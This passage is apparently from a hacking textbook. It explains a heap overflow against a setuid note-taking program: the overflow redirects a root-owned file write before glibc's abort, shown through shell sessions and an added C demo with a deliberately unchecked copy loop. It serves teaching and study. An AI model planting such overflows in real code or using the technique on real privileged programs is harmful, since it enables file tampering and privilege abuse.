b7e99000-b7e9a000 rw-p b7e99000 00:00 0
b7e9a000-b7fd5000 r-xp 00000000 07:00 15795 /rofs/lib/tls/i686/cmov/libc-2.5.so
b7fd5000-b7fd6000 r--p 0013b000 07:00 15795 /rofs/lib/tls/i686/cmov/libc-2.5.so
b7fd6000-b7fd8000 rw-p 0013c000 07:00 15795 /rofs/lib/tls/i686/cmov/libc-2.5.so
b7fd8000-b7fdb000 rw-p b7fd8000 00:00 0
b7fe4000-b7fe7000 rw-p b7fe4000 00:00 0
b7fe7000-b8000000 r-xp 00000000 07:00 15421 /rofs/lib/ld-2.5.so
b8000000-b8002000 rw-p 00019000 07:00 15421 /rofs/lib/ld-2.5.so
bffeb000-c0000000 rw-p bffeb000 00:00 0 [stack]
ffffe000-fffff000 r-xp 00000000 00:00 0 [vdso]
Aborted
reader@hacking:~/booksrc $
This time, the overflow is designed to overwrite the datafile buffer with
the string testfile. This causes the program to open and write to testfile
instead of /var/notes, as it was originally programmed to do. However, when
the heap memory is released by free(), the damage to the chunk headers is
detected and the program is terminated with the Aborted message shown above.
Similar to the return address overwrite with stack overflows, there are
control points within the heap architecture itself. The most recent versions
of glibc use heap memory management functions that have evolved specifically
to counter heap unlinking attacks. Since version 2.2.5, these functions have
been rewritten to print debugging information and terminate the program when
they detect problems with the heap header information. This makes heap
unlinking attacks on Linux very difficult. However, this particular exploit
doesn't rely on the heap header information at all: it only overwrites the
contents of the adjacent datafile allocation, so by the time free() is
called, the program has already opened and written to the attacker-chosen
file with root privileges. The order of operations is what makes this work:
the file is written and closed before either buffer is freed, so the abort
comes too late to undo anything.
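The following program reproduces that ordering as an added example; it is not notetaker.c and not code from the book. It makes the same two allocations, measures the distance between them at run time instead of assuming 104 bytes (on 64-bit glibc it is 112), copies an attacker-style input of 'A's followed by testfile into the first one with an unchecked loop, and then inspects the second allocation and its chunk size field. The names BUFFER_SIZE, DATAFILE_SIZE, heap_demo and run_overflow are my own. It assumes glibc's allocator places the two chunks back to back, as it did in the run above; if an allocator does not, run_overflow reports a distance of 0 or an out-of-range value and does nothing.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFFER_SIZE   100   /* mirrors notetaker's buffer = ec_malloc(100) */
#define DATAFILE_SIZE 20    /* mirrors notetaker's datafile = ec_malloc(20) */

/* What the simulated overflow leaves behind, returned for inspection. */
struct heap_demo {
    long distance;        /* bytes from buffer to datafile under this libc */
    char datafile[64];    /* contents of the datafile allocation afterwards */
    int header_clobbered; /* 1 if the 'A's ran over datafile's chunk size field */
};

/* Two back-to-back allocations, then an unchecked copy of attacker-controlled
 * input into the first one. The distance is measured rather than hard-coded,
 * so the same code works on 32-bit (104) and 64-bit (112) glibc. */
struct heap_demo run_overflow(const char *target)
{
    struct heap_demo r;
    memset(&r, 0, sizeof r);

    char *buffer = malloc(BUFFER_SIZE);
    char *datafile = malloc(DATAFILE_SIZE);
    if (buffer == NULL || datafile == NULL)
        exit(1);
    strcpy(datafile, "/var/notes");         /* the intended output file */

    r.distance = (long)(datafile - buffer);
    snprintf(r.datafile, sizeof r.datafile, "%s", datafile);
    if (r.distance <= 0 || r.distance > 4096) /* chunks not adjacent: bail out */
        return r;

    /* Attacker input: enough 'A's to reach datafile, then the new file name. */
    size_t dist = (size_t)r.distance;
    size_t len = dist + strlen(target);
    char *input = malloc(len + 1);          /* allocated BEFORE the heap is damaged */
    if (input == NULL)
        exit(1);
    memset(input, 'A', dist);
    strcpy(input + dist, target);

    /* The vulnerable step: strcpy(buffer, argv[1]) with no length check,
     * written as a plain loop so the compiler cannot swap in a checked copy. */
    for (size_t i = 0; i <= len; i++)
        buffer[i] = input[i];

    snprintf(r.datafile, sizeof r.datafile, "%s", datafile);

    /* The size field of datafile's chunk sits immediately below its user
     * pointer; after the overflow it is full of 'A's, and that is what a
     * later free(datafile) aborts on. */
    const unsigned char *size_field = (const unsigned char *)datafile - sizeof(size_t);
    r.header_clobbered = 1;
    for (size_t i = 0; i < sizeof(size_t); i++)
        if (size_field[i] != 'A')
            r.header_clobbered = 0;

    free(input);                            /* its own header is intact */
    /* buffer and datafile are deliberately leaked: freeing them here would
     * reproduce the "Aborted" from the notetaker run above. */
    return r;
}

int main(void)
{
    struct heap_demo d = run_overflow("testfile");
    printf("distance buffer->datafile: %ld bytes\n", d.distance);
    printf("datafile now names: %s\n", d.datafile);
    printf("chunk header clobbered: %s\n", d.header_clobbered ? "yes" : "no");
    return 0;
}
```

Build it with gcc and run it: the second line of output shows datafile reading testfile while the process is still alive, which is the window notetaker uses to open the file as root. Add a free(datafile) after the copy and glibc's header checks fire exactly as on the page, but only after the redirected write has already happened.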
reader@hacking:~/booksrc $ grep -B10 free notetaker.c
   if(write(fd, buffer, strlen(buffer)) == -1) // Write note.
      fatal("in main() while writing buffer to file");
   write(fd, "\n", 1); // Terminate line.
   // Closing file
   if(close(fd) == -1)
      fatal("in main() while closing file");
   printf("Note has been saved.\n");
   free(buffer);
   free(datafile);
reader@hacking:~/booksrc $ ls -l ./testfile
-rw------- 1 root reader 118 2007-09-09 16:19 ./testfile
reader@hacking:~/booksrc $ cat ./testfile
cat: ./testfile: Permission denied
reader@hacking:~/booksrc $ sudo cat ./testfile
?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtestfile
reader@hacking:~/booksrc $